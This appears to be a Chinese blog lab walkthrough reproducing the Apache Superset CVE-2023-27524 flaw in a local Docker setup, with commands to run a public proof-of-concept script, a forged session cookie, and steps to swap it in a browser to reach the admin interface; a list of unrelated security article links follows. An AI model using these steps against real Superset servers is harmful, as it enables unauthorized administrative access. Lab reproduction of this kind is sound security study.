ApacheSuperset CVE-2023-27524

前言:CVE-2023-27524 是一种远程代码执行漏洞,攻击者通过该漏洞可在受影响系统上执行任意代码,从而获得未授权访问权

CVE-2023-27524 GitHubhttps://github.com/horizon3ai/CVE-2023-27524

任务一 代理 | 拉取镜像

复制代码
vi /etc/proxychains4.conf
//最下面修改真机IP端口
复制代码
docker compose up -d
docker ps
//拉取成功后查看8088就是服务器端口

任务二 python 问题解决

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//发现缺少 'flask_unsign'
复制代码
python3 -m venv myenv
source myenv/bin/activate
//创建并激活一个虚拟环境

//安装 flask-unsign
proxychains4 pip install flask-unsign

任务三 生成cookie

复制代码
python3 CVE-2023-27524.py --url 192.168.247.139:8088 --id 1 --validate
//下面这样就是安装成功了

【eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.aEAshA.TmTRYFed6TPxFmeOmLRrQAXX3vc】

任务四 替换cookie

复制代码
//随便下载一个cookie的小插件 我用的是cookieManage
复制代码
//替换进去保存,刷新一下就进管理界面了

任务五 实验结束

相关推荐
科技云报道5 小时前
2025全球数字经济大会—云智算安全论坛暨第三届“SecGo论坛”成功召开!共筑安全新生态
安全
群联云防护小杜8 小时前
构建分布式高防架构实现业务零中断
前端·网络·分布式·tcp/ip·安全·游戏·架构
独行soc10 小时前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网
花木偶11 小时前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
qq_3129201112 小时前
主机安全-开源HIDS字节跳动Elkeid使用
安全
黑客老李19 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_52119 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
薄荷椰果抹茶20 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_4723394620 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li20 小时前
WebView安全实现(一)
android·安全·webview